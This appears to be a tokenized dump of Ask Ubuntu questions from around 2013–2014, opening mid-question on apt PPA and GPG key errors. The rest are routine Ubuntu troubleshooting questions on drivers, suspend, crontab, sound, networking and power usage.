//ppa.launchpad.net/clicompanion-devs/clicompanion-nightlies/ubuntu/dists/saucy/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/openshot.developers/ppa/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/openshot.developers/ppa/ubuntu/dists/saucy/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/ubuntu-vn/ppa/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/ubuntu-vn/ppa/ubuntu/dists/saucy/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/ylatuya/ppa/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/ylatuya/ppa/ubuntu/dists/saucy/main/binary-i386/packages 404 not found w : some index files failed to download . they have been ignored , or old ones used instead . also , regularly it 's occurring a message as below : followed the section called `` how to eliminate these errors '' , got some ppa fixed , not all , then followed danilo in the same page to disable all your ppas : eventually , i realize that my error instance is `` the following signatures could n't be verified because the public key is not available : no_pubkey ... ... . '' ign http : //archive.ubuntu.com saucy-proposed/universe translation-en_us fetched 27.6 mb in 1min 36s ( 287 kb/s ) reading package lists ... done w : gpg error : http : //archive.ubuntu.com saucy release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : //archive.ubuntu.com saucy-updates release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : //archive.ubuntu.com saucy-security release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : //archive.ubuntu.com saucy-proposed release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 how should i solve this ? : ~ $ cat /etc/apt/sources.list # deb cdrom : [ ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) ] / saucy main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu saucy main restricted deb-src http : //archive.ubuntu.com/ubuntu saucy main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu saucy-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu saucy-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu saucy universe deb-src http : //archive.ubuntu.com/ubuntu saucy universe deb http : //archive.ubuntu.com/ubuntu saucy-updates universe deb-src http : //archive.ubuntu.com/ubuntu saucy-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu saucy multiverse deb-src http : //archive.ubuntu.com/ubuntu saucy multiverse deb http : //archive.ubuntu.com/ubuntu saucy-updates multiverse deb-src http : //archive.ubuntu.com/ubuntu saucy-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu saucy-security main restricted deb-src http : //archive.ubuntu.com/ubuntu saucy-security main restricted deb http : //archive.ubuntu.com/ubuntu saucy-security universe deb-src http : //archive.ubuntu.com/ubuntu saucy-security universe deb http : //archive.ubuntu.com/ubuntu saucy-security multiverse deb-src http : //archive.ubuntu.com/ubuntu saucy-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu saucy partner deb-src http : //archive.canonical.com/ubuntu saucy partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu saucy main deb-src http : //extras.ubuntu.com/ubuntu saucy main # deb https : //ppa.launchpad.net/clamtk saucy main # deb-src https : //ppa.launchpad.net/clamtk saucy main deb http : //deb.torproject.org/torproject.org saucy main deb http : //archive.ubuntu.com/ubuntu saucy-proposed universe main restricted multiverse and : ~ $ cat /etc/apt/sources.list.d/*.list deb http : //ppa.launchpad.net/apt-fast/stable/ubuntu saucy main deb-src http : //ppa.launchpad.net/apt-fast/stable/ubuntu saucy main deb http : //ppa.launchpad.net/atareao/atareao/ubuntu saucy main deb-src http : //ppa.launchpad.net/atareao/atareao/ubuntu saucy main # deb http : //ppa.launchpad.net/birdie-team/stable/ubuntu saucy main # deb-src http : //ppa.launchpad.net/birdie-team/stable/ubuntu saucy main deb http : //ppa.launchpad.net/cairo-dock-team/ppa/ubuntu saucy main deb-src http : //ppa.launchpad.net/cairo-dock-team/ppa/ubuntu saucy main deb http : //ppa.launchpad.net/ehoover/compholio/ubuntu saucy main deb-src http : //ppa.launchpad.net/ehoover/compholio/ubuntu saucy main deb http : //ppa.launchpad.net/ffdiaporamateam/stable/ubuntu saucy main deb-src http : //ppa.launchpad.net/ffdiaporamateam/stable/ubuntu saucy main deb http : //ppa.launchpad.net/fossfreedom/packagefixes/ubuntu saucy main deb-src http : //ppa.launchpad.net/fossfreedom/packagefixes/ubuntu saucy main deb http : //ppa.launchpad.net/fossfreedom/rhythmbox-plugins/ubuntu saucy main deb-src http : //ppa.launchpad.net/fossfreedom/rhythmbox-plugins/ubuntu saucy main deb http : //ppa.launchpad.net/fossfreedom/rhythmbox/ubuntu saucy main deb-src http : //ppa.launchpad.net/fossfreedom/rhythmbox/ubuntu saucy main deb http : //ppa.launchpad.net/gabriel1984sibiu/aplicatii/ubuntu saucy main # deb-src http : //ppa.launchpad.net/gabriel1984sibiu/aplicatii/ubuntu saucy main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //www.geogebra.net/linux/ stable main deb http : //dl.google.com/linux/chrome/deb/ stable main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . # deb http : //dl.google.com/linux/talkplugin/deb/ stable main deb http : //ppa.launchpad.net/gstreamer-developers/ppa/ubuntu saucy main deb-src http : //ppa.launchpad.net/gstreamer-developers/ppa/ubuntu saucy main deb http : //ppa.launchpad.net/jacob/media/ubuntu saucy main deb-src http : //ppa.launchpad.net/jacob/media/ubuntu saucy main # deb http : //ppa.launchpad.net/landronimirc/clamtk/ubuntu saucy main # deb-src http : //ppa.launchpad.net/landronimirc/clamtk/ubuntu saucy main deb http : //ppa.launchpad.net/libreoffice/ppa/ubuntu saucy main deb-src http : //ppa.launchpad.net/libreoffice/ppa/ubuntu saucy main deb http : //ppa.launchpad.net/linrunner/tlp/ubuntu saucy main deb http : //ppa.launchpad.net/me-davidsansome/clementine/ubuntu saucy main deb-src http : //ppa.launchpad.net/me-davidsansome/clementine/ubuntu saucy main # # please report any bug on https : //bugs.launchpad.net/medibuntu/ deb http : //ppa.launchpad.net/mqchael/pipelight/ubuntu saucy main deb-src http : //ppa.launchpad.net/mqchael/pipelight/ubuntu saucy main deb http : //ppa.launchpad.net/nathan-renniewaldock/xbmc-stable/ubuntu saucy main deb-src http : //ppa.launchpad.net/nathan-renniewaldock/xbmc-stable/ubuntu saucy main deb http : //ppa.launchpad.net/nilarimogard/webupd8/ubuntu saucy main deb-src http : //ppa.launchpad.net/nilarimogard/webupd8/ubuntu saucy main # deb http : //ppa.launchpad.net/no1wantdthisname/openjdk-fontfix/ubuntu saucy main # deb-src http : //ppa.launchpad.net/no1wantdthisname/openjdk-fontfix/ubuntu saucy main deb http : //ppa.launchpad.net/noobslab/pear-apps/ubuntu saucy main deb-src http : //ppa.launchpad.net/noobslab/pear-apps/ubuntu saucy main deb http : //ppa.launchpad.net/nuvola-player-builders/stable/ubuntu saucy main deb-src http : //ppa.launchpad.net/nuvola-player-builders/stable/ubuntu saucy main deb http : //ppa.launchpad.net/nvbn-rm/ppa/ubuntu saucy main deb-src http : //ppa.launchpad.net/nvbn-rm/ppa/ubuntu saucy main # this file makes sure that opera browser is kept up-to-date # as part of regular system upgrades # the line above will make sure you get all final public releases . # uncomment the following line if you want to get alpha and beta # releases , too . deb http : //ppa.launchpad.net/peterlevi/ppa/ubuntu saucy main deb-src http : //ppa.launchpad.net/peterlevi/ppa/ubuntu saucy main deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/able2extract/ubuntu saucy main # added by software-center ; credentials stored in /etc/apt/auth.conf deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/chess/ubuntu saucy main # added by software-center ; credentials stored in /etc/apt/auth.conf deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/color-by-numbers-halloween-free/ubuntu saucy main # added by software-center ; credentials stored in /etc/apt/auth.conf deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/master-pdf-editor/ubuntu saucy main # added by software-center ; credentials stored in /etc/apt/auth.conf deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/minitube-ubuntu/ubuntu saucy main # added by software-center ; credentials stored in /etc/apt/auth.conf deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/outreel/ubuntu saucy main # added by software-center ; credentials stored in /etc/apt/auth.conf deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/splashtop-client/ubuntu saucy main # added by software-center ; credentials stored in /etc/apt/auth.conf deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/varicad-viewer/ubuntu saucy main # added by software-center ; credentials stored in /etc/apt/auth.conf deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/wuala/ubuntu saucy main # added by software-center ; credentials stored in /etc/apt/auth.conf deb http : //ppa.launchpad.net/rvm/smplayer/ubuntu saucy main deb-src http : //ppa.launchpad.net/rvm/smplayer/ubuntu saucy main deb http : //ppa.launchpad.net/saiarcot895/myppa/ubuntu saucy main deb-src http : //ppa.launchpad.net/saiarcot895/myppa/ubuntu saucy main deb http : //ppa.launchpad.net/skunk/pepper-flash/ubuntu saucy main deb-src http : //ppa.launchpad.net/skunk/pepper-flash/ubuntu saucy main deb http : //ppa.launchpad.net/skype-wrapper/ppa/ubuntu saucy main deb-src http : //ppa.launchpad.net/skype-wrapper/ppa/ubuntu saucy main deb http : //ppa.launchpad.net/tualatrix/ppa/ubuntu saucy main deb-src http : //ppa.launchpad.net/tualatrix/ppa/ubuntu saucy main # deb http : //ppa.launchpad.net/ubuntu-vn/ppa/ubuntu saucy main # deb-src http : //ppa.launchpad.net/ubuntu-vn/ppa/ubuntu saucy main deb http : //ppa.launchpad.net/videolan/stable-daily/ubuntu saucy main deb http : //ppa.launchpad.net/vincent-c/cherrytree/ubuntu saucy main deb-src http : //ppa.launchpad.net/vincent-c/cherrytree/ubuntu saucy main deb http : //ppa.launchpad.net/webupd8team/java/ubuntu saucy main deb-src http : //ppa.launchpad.net/webupd8team/java/ubuntu saucy main deb-src http : //ppa.launchpad.net/webupd8team/java/ubuntu saucy main deb http : //ppa.launchpad.net/webupd8team/tor-browser/ubuntu saucy main deb-src http : //ppa.launchpad.net/webupd8team/tor-browser/ubuntu saucy main deb http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu saucy main deb-src http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu saucy main deb http : //ppa.launchpad.net/wfg/0ad/ubuntu saucy main deb-src http : //ppa.launchpad.net/wfg/0ad/ubuntu saucy main # deb http : //ppa.launchpad.net/ylatuya/ppa/ubuntu saucy main # deb-src http : //ppa.launchpad.net/ylatuya/ppa/ubuntu saucy main
411493	graphics driver help - on-board amd	i 'm trying to install draftsight on ubuntu64 12.04 lts with an on-board amd graphics processor . i suspect i 'm having a driver problem because when i first installed it , it would lock up my computer as soon as i opened draftsight . i updated my graphics driver and now i can work in it for several minutes before it locks up the computer . there does n't seem to be one action that i can repeat to recreate the problem and it completely locks the computer , no mouse or keyboard interaction . ( ctrl+t , ctrl+alt+del do nothing ) i 'm not even sure where to start on figuring this out but here 's the output of glxinfo and lspci $ glxinfo | grep opengl opengl vendor string : advanced micro devices , inc. opengl renderer string : ati radeon hd 4200 opengl version string : 3.3.11627 compatibility profile context opengl shading language version string : 3.30 opengl extensions : $ lspci | grep vga 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs880 [ radeon hd 4200 ]
411496	gui in ubuntu server - interfaz grafica en ubuntu server	good morning , i 'm installing ubuntu server , but to lift my website would like to add a graphical interface , and so more comfortable way to work while i 'm acclimating to the system , it is advisable to do this ? if so what kind of interface is lighter xfce , kde , gnome ... thank you original question : buenos dias , estoy instalando ubuntu server , pero para levantar mi pagina web quisiera agregarle una interfaz grafica y asi trabajar de forma mas comoda mientras me voy ambientando al sistema , es aconsejable hacer esto ? si es asi que tipo de interfaz es menos pesada xfce , kde , gnome ... gracias
411497	`` shut down '' and `` restart '' from system ( drop-down ) menu inactive	the `` shut down '' and `` restart '' options from the menu ( see image below ) are not responsive ( nothing happens after i click either of them ) . a few minutes after launching ubuntu the `` restart '' option disappears . how to restore the default . my platform : ubuntu 13.10
411499	can i use my ubuntu for network administration ?	can you please name some tools that will help me analyze and administrate network and server ?
411502	when trying live ubuntu not getting audio	when trying live ubuntu or ubuntu based distro 's am not able to get any audio . using asus f2 mothetrboard , cpu 5800k dual graphics mode .
411503	is there a dynamic-multiple-monitor friendly desktop environment available for ubuntu ?	i use a laptop and like to migrate during the day from one ( physical ) workplace to another and connect to an external monitor if available . i also must multitask a lot , so i have a lot of windows open at any given time and many ( virtual ) workspaces to organize them on . but each time i connect / disconnect the external monitor all my careful arrangement is gone . this makes me really mad . is there a desktop environment that just leaves the windows alone when you connect / disconnect a second monitor ? or even better , that remembers the window arrangement per monitor arrangement ? so that when i went from my home office ( 17 '' monitor on top of the laptop screen ) to my usual workplace ( 21 '' monitor left of the laptop screen ) or my colleague 's desk ( 19 '' monitor right of the latop screen ) , the windows end up where they were the last time that monitor was connected - or stay put if they never saw this monitor . the way unity `` handles '' external monitors just makes me sad and wish i did n't have all those extra monitors to connect and once i connect it makes me chained to this arrangement , as if i had a desktop machine nailed to the floor .
411505	script timeout passed , if you want to finish import , please resubmit same file and import will resume	i am getting this error while importing the database in mysql , and when i resubmit the same file than i am getting this error error sql query : -- -- dumping data for table `adminnotification_inbox` -- insert into `adminnotification_inbox` ( `notification_id` , `severity` , `date_added` , `title` , `description` , `url` , `is_read` , `is_remove` ) values ( 1 , 4 , '2008-07-25 05:24:17 ' , 'magento 1.1 production version now available ' , 'we are thrilled to announce the availability of the production release of magento 1.1 . read more about the release in the magento blog . ' , 'http : //www.magentocommerce.com/blog/comments/magento-11-is-here-1/ ' , 0 , 0 ) , ( 2 , 4 , '2008-08-02 05:29:53 ' , 'updated iphone theme is now available ' , 'updated iphone theme for magento 1.1 is now available on magento connect and for upgrade through your magento connect manager . ' , 'http : //www.magentocommerce.com/blog/comments/updated-iphone-theme-for-magento-11-is-now-available/ ' , 0 , 0 ) , ( 3 , 3 , '2008-08-02 05:40:04 ' , 'magento version 1.1.2 is now available ' , 'magento version 1.1.2 is now available for download and upgrade . ' , 'http : //www.magentocommerce.com/blog/comments/mag [ ... ] mysql said : documentation # 1062 - duplicate entry '1 ' for key 'primary' what should i do now . i already use the time increasing solutions given on the internet but nothing happen . how should i fix this error . my database size is just only 3 mb . i am using xampp 1.8.3 in ubuntu 12.04 .
411508	ubuntu can not read hard disk partitions	i 'm trying to install ubuntu by splitting partition on my dard disk drive . but ubuntu can not read my hard disk or its partitions , what should i do now ?
411510	ubuntu server , wine and gui	i 'm setting up an ubuntu server and like the very low impact the server has compared to the desktop edition . unfortunately i have one program that is windows only and i ca n't find a suitable linux replacement yet and that is hfs server ( open to a linux alternative ) i have installed ubuntu server and installed openbox . i can get in to openbox using the startx command . what i need is for that to happen automatically and then for wine to startup with hfs is this possible ?
411514	how to recover a deleted /etc/passwd ?	i deleted the /etc/passwd file and can not login now . i do n't know the root password and tried lots of passwords , but none of them worked . how can i fix this ?
411521	ubuntu bind9 set up and resolv.conf	i found this tutorial the best i 've come across and it works ! well done although i ca n't vote and comment on it due to my site privilege as yet . how do i do a complete bind9 dns server configuration with a hostname ? my question is , i 'm unsure about the resolv.conf file , where the tutorial states to insert the nameserver , domain and search . my resolv.conf file has a comment above it saying `` do not edit this file by hand - your changes will be overwritten '' . can anyone clarify this for me please ? thanks in advance , mario .
411523	translation - `` adding the key to the list of trusted software vendors failed ''	i am translating for ubuntu . this text belongs in ../aptdaemon/enums.py:382 as part of software center , ( the settings where it sets the apt sources and where you can add custom sources ) . does anyone know if the `` key '' means : this one to open doors , the stinking point , the button , the fundamental , ... etc . you know how many meanings ... so what is the best described meaning , because my language chinese is very specific .
411532	installing ubuntu dual boot with windows 8	i want to install ubuntu dual boot with windows 8 . i have an iso file , do i need to modify the boot menu to install the iso file of ubuntu .
411534	start up message : the disk driver for /dev/mapper/cryptswap1 is not ready yet or not present	when i start my ubuntu ( i have only ubuntu , no other os- lenevo b560 ) the start screen displays this message . i have version 12.04 , but initially when i install this there is no such message , but after downloading updates i got this message.the message is like below : - the disk driver for /dev/mapper/cryptswap1 is not ready yet or not present . continue to wait , or press s to skip mounting or m for manual recovery . so it takes some more time to boot . i am a basic user having no knowledge about command lines . so please be slight not technical or exact step by step description
411535	system crontab entries not being run	i am running ubuntu 12.04 lts desktop . i have used the /etc/crontab to set up a couple of entries that should run at different schedules . now , the problem is that these do not seem to be running . i have used these same entries in other ubuntu systems and they work alright . here is my crontab file : # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/crontab : system-wide crontab # unlike any other crontab you do n't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d . these files also have username fields , # that none of the other crontabs do . shell=/bin/bash path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin # m h dom mon dow user command 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly ) â6 2-6/2 * * * root wget localhost/estimator/update_to_cs.php â26 2-6/2 * * * root wget localhost/estimator/update_estimator_cron.php * * * * * printo touch /home/printo/test_cron_output.txt * * * * * printo date > > /home/printo/test_cron_output.txt # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- the user printo exists and has sudo privileges as well . ps -ef | grep cron shows that cron is running . any pointers on what i may be missing or a way to get to the root of the issue ? tia .
411538	screen brightness not changing after installing ubuntu 12.04. set to minimum	i installed ubuntu 12.04 32 bit on my 64 bit dell inspiron ( core i3 ) laptop . but after installing it the screen brightness is set to minimum and the brightness up/down keys dont function .
411540	how to get wget to download exact same web page html as browser	using a web browser ( ie or chrome ) i can save a web page ( .html ) with ctl-s , inspect it with any text editor , and see data in a table format . one of those numbers i want to extract , but for many , many web pages , too many to do manually . so i 'd like to use wget to get those web pages one after another , and write another program to parse the .html and retrieve the number i want . but the .html file saved by wget when using the same url as the browser does not contain the data table . why not ? it is as if the server detects the request is coming from wget and not from a web browser , and supplies a skeleton web page , lacking the data table . how can i get the exact same web page with wget ? - thx ! more info : an example of the url i 'm trying to fetch is : http : //performance.morningstar.com/fund/performance-return.action ? t=icenx & region=usa & culture=en-us where the string icenx is a mutual fund ticker symbol , which i will be changing to any of a number of different ticker symbols . this downloads a table of data when viewed in a browser , but the data table is missing if fetched with wget .
411543	how to fix : high hdd activity and slower system after few suspend cycles ?	after a few cycles of suspending and waking up , on system wakeup hdd activity lasts for ~5-10 minutes ( should n't be the ram used instead of hdd ? ) and even when it is done , the whole system feels slower compared to the state after reboot . i think it does n't make a difference if i have any ( additional ) programs running while suspending . what is causing high hdd activity after a suspend ( while the ram memory is barely filled ) ? why the system feels slower after suspending in comparison to rebooting ? this is ubuntu 12.04 lts x64 on a notebook 2x 1.6 ghz , 4 gb ram ( max 30 % used while suspending ) , 4 gb swap 80 % and ~70gb free hdd space for the system .
411545	ethernet driver intel 82579lm e1000e update	i have a problem with my ethernet wired connection that does n't work on ubuntu 13.10 , using intel 82579lm controller . on the same pc , windows 7 works perfectly , so i guess that it 's a driver issue . the `` lshw '' command says that installed driver is 2.3.2-k version , quite an old one . i downloaded the last intel driver version e1000e-2.5.4.tar.gz , but ... how to install the e1000e-2.5.4.tar.gz driver ? i mean , now it 's in my `` home/downloaded '' folder . 2.1 - how to convert the e1000e-2.5.4.tar.gz in a `` driver '' format . i think i should compile it or something like that . where to put the resulting driver file in order that the `` modprobe e1000e '' command can find it ? thanks a lot . of course , i 'm a newbie , and as you can see my question is quite a general one : `` how to update an old driver ? ''
411546	i want to know if my ram is ok for ubuntu	hi i have a amd64 2800mz procresor with 256mib ram , what ubuntu can install to run smoothly ? .
411548	ca n't resume from wol with realtek nics	i can’t get wol to work and i’m getting desperate , please , please , any hint or clue might help me ! i’m using ubuntu 13.10 , motherboard asrock b75 pro3-m with intel g2020 . the mobo has an onboard nic chipset realtek r8111e , i also have a pci nic , which has chipset realtek r8169 . no matter what network card i use ( onboard or pci card ) , wol is not working . neither led light of the nics remains on when being suspended , so i suspect the network cards are de-activated despite all the settings . i activated wake with pci and rtc in bios i disabled deep-sleep in bios using ethtool , i verify that the wakeup status = g ( it seems to be by default in this case ) i modified /etc/init.d/halt , setting netdown = no in /etc/rc.local i enable the proper devices in /proc/acpi/wakeup i installed the realtek driver for the nic’s ( website realtek ) i created suspend hooks ( nrs 45 and 55 ) , where ethtool , ifconfig and /proc/acpi/wakeup are simply echoed to the suspend log . in these logs i see that the nics are still enabled at that time . i tried different versions of ubuntu , ranging from 12.04 , over 13.04 to 13.10 i tried both situations with pci nic removed or onboard nic disabled . i’m running out of options to get my pc to resume from suspend… can anyone please help ? thanks so much in advance ! kind regards , david .
411550	no option under `` sound settings '' to output 5.1 audio thru hdmi , only stereo	i 'm trying to output 5.1 audio thru hdmi to a 5.1 home theatre receiver , but can only get stereo out to it . i have another laptop that can output 5.1 to it just fine . under sound settings > output > hdmi , i do n't see the drop down menu for 5.1 surround like i do in my other laptop . aplay -l : **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc272 analog [ alc272 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 speaker-test -l 4 -c 6 -r 48000 -d hw:0,3 : speaker-test 1.0.27.1 playback device is hw:0,3 stream parameters are 48000hz , s16_le , 6 channels using 16 octaves of pink noise channels count ( 6 ) not available for playbacks : invalid argument setting of hwparams failed : invalid argument any help appreciated
411553	ca n't boot into ubuntu 12.04 lts âtry ( hd0,0 ) : ext2 : i/o error _ `` message	i recently installed ubuntu 12.04 alongside windows 8 . the installation was error less but when i try to boot with ubuntu , i got following error : try ( hd0,0 ) : ext2 : i/o error _ but when i press ctrl+alt+del and restart the computer i got windows welcome screen and the windows 8 worked fine . but when i chose to boot with ubuntu , same thing happened again .
411554	what are the system requirements for gnome classic in ubuntu 12.04 lts	as the title says : what are the system requirements for gnome classic in ubuntu 12.04 lts ? i would like an answer for gnome classic for ubuntu 12.04 , not for gnome flashback on newer releases of ubuntu and gnome .
411555	problems after upgrading from 12.04.2 to 12.10	so yesterday , i upgraded my 12.04.2 to 12.10 using the update manager . after the 3-hour download and installation was done , when the system booted up , everything got laggy , no display driver , however , on 12.04.2 , even steam detected a new driver . i added the ppa for the additional drivers and stuff , got some updates about them , but still laggy and its now getting really annoying , videos are laggy too . so my question is : how can i make ubuntu as smooth as before on 12.04.2 ?
411557	powertop : what is `` system baseline power '' ?	i 'm running ubuntu 13.10 on a msi gs70 stealth laptop . when i run powertop 2.4 it tells that ( device stats tab ) : the battery reports a discharge rate of 39.8 w system baseline power is estimated at 23.2 w what does system baseline power mean ? is n't it wrong , that it 's so big ?
411559	powertop : why sum of `` power est '' values is much less than discharge rate ?	i 'm running ubuntu 13.10 on a msi gs70 stealth laptop . when i run powertop 2.4 , i see : the battery reports a discharge rate of 38.1 w the estimated remaining time is 0 hours , 5 minutes summary : 1524,0 wakeups/second , 56,0 gpu ops/seconds , 0,0 vfs ops/sec and 28,3 % cpu use power est . usage events/s category description 6.97 w 96,7 % device display backlight 1.19 w 18,9 ms/s 296,8 interrupt [ 6 ] tasklet ( softirq ) 586 mw 1,2 ms/s 146,8 kwork od_dbs_timer 525 mw 7,0 ms/s 130,8 process smbd -f 454 mw 3,1 ms/s 113,4 timer hrtimer_wakeup 450 mw 3,4 ms/s 113,5 process /usr/bin/pulseaudio -- start -- log-target=syslog 445 mw 10,5 ms/s 100,6 process /opt/google/chrome/chrome -- no-startup-window 398 mw 20,4 ms/s 91,5 process compiz 369 mw 1,1 ms/s 92,4 process [ rcu_sched ] 323 mw 79,0 ms/s 72,7 process /opt/google/chrome/chrome -- type=renderer -- lang=en-us -- force-fieldtrials=autocompletedynamictrial_2/defaultcontrol_r2_stable/ 301 mw 35,1 ms/s 67,6 process /usr/bin/tilda 230 mw 1,8 ms/s 57,5 timer tick_sched_timer 163 mw 3,9 ms/s 40,4 interrupt [ 46 ] i915 158 mw 10,7 ms/s 38,5 process /usr/bin/ibus-daemon -- daemonize -- xim 89.6 mw 21,9 ms/s 20,1 process /usr/bin/x -core :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch 86.9 mw 2,0 ms/s 21,6 interrupt ps/2 touchpad / keyboard / mouse 73.7 mw 3,0 ms/s 18,1 process /usr/lib/ibus/ibus-engine-simple 69.0 mw 169,3 µs/s 17,3 kwork flush_to_ldisc 67.2 mw 149,9 µs/s 16,8 kwork intel_unpin_work_fn 47.2 mw 11,5 ms/s 10,6 process /usr/lib/unity/unity-panel-service 43.3 mw 321,8 µs/s 10,8 process java -jar downloads/tomighty-0.7.1.jar 42.3 mw 3,7 ms/s 10,2 process /opt/google/chrome/chrome -- type=renderer -- lang=en-us -- force-fieldtrials=autocompletedynamictrial_2/defaultcontrol_r2_stable/ 30.7 mw 6,9 ms/s 7,0 process powertop 30.7 mw 1,0 ms/s 7,6 process zeitgeist-datahub 29.8 mw 1,4 ms/s 7,3 process /usr/lib/x86_64-linux-gnu/indicator-application-service 28.0 mw 36,6 µs/s 7,0 kwork console_callback 26.8 mw 3,4 ms/s 6,4 process indicator-multiload 25.0 mw 126,9 µs/s 5,6 process syndaemon -i 1.0 -t -k -r 23.4 mw 87,2 µs/s 5,8 kwork ieee80211_iface_work 20.4 mw 6,7 ms/s 4,4 process /opt/google/chrome/chrome -- type=renderer -- lang=en-us -- force-fieldtrials=autocompletedynamictrial_2/defaultcontrol_r2_stable/ 19.9 mw 236,9 µs/s 5,0 process [ rcuos/7 ] 16.6 mw 648,9 µs/s 4,1 process /usr/lib/x86_64-linux-gnu/bamf/bamfdaemon 16.2 mw 687,7 µs/s 4,0 process /usr/bin/gtk-window-decorator 15.1 mw 3,3 ms/s 3,4 process /usr/lib/x86_64-linux-gnu/hud/hud-service 14.5 mw 391,1 µs/s 3,6 interrupt [ 1 ] i8042 10.9 mw 248,1 µs/s 2,7 interrupt [ 4 ] block ( softirq ) why if i sum all the values in the power est . column i do n't get the 38.1w of the discharge rate , but only something like 8~9w ?
411562	failed to fetch sudo apt-get update	when i want to updating . w : failed to fetch http : //ppa.launchpad.net/osd-lyrics/ppa/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/osd-lyrics/ppa/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . any idea ? ? : (
411563	apt-get a specific historical version of nvidia driver	i am running my ubuntu os in text only mode after recently having some problems trying to update the nvidia driver . i would like to use apt-get to download an older version of the nvidia driver for my machine however most of the examples , such as this one , are in the format : sudo apt-get install nvidia-current version information : running lspci -nn | grep vga tells me i have a gf104 geforce gtx 460 oem rev a1 additional information i 'm told that the version 310 ( from here ) might do the trick but ca n't seem to get it on the command line . can you please help me identify versions from the terminal and then run install on that version ? thanks for your time
411564	black screen after installing gflrx on ubuntu 13.10	i am running ubuntu 13.10 on my pc with 2x sapphire radeon hd 7950 . after i installed fglrx , ran sudo aticonfig -- adapter=all -- initial and rebooted , i get a black screen . when i go into recovery mode and run fglrxinfo , it gives me the following output : unable to open display ( null ) when i looked on the ubuntu forums someone suggested i run aticonfig -- acpi-services=off but unfortunately this doesnt seem to have any effect . i should also mention that i previously had an install with fglrx on this system which worked fine . at some point this black screen appeared . after that i decided to reinstall ubuntu , which works fine until i install fglrx again . does anyone have some suggestion ? any help would be appreciated , and i would be happy to provide more information if needed . thanks in advance !
411565	how to update a device driver ?	how to move from a driverfile.tar.gz file to an installed or updated driver ? more specific : i 'm a new 13.10 user . my wired network does n't work . i found that the lan driver could be obsolete . i got from the intel website , the latest driver version in the tar.gz format . now i do n't know how to install it . is there any standard procedure ? i did n't find it on the on line documentation .
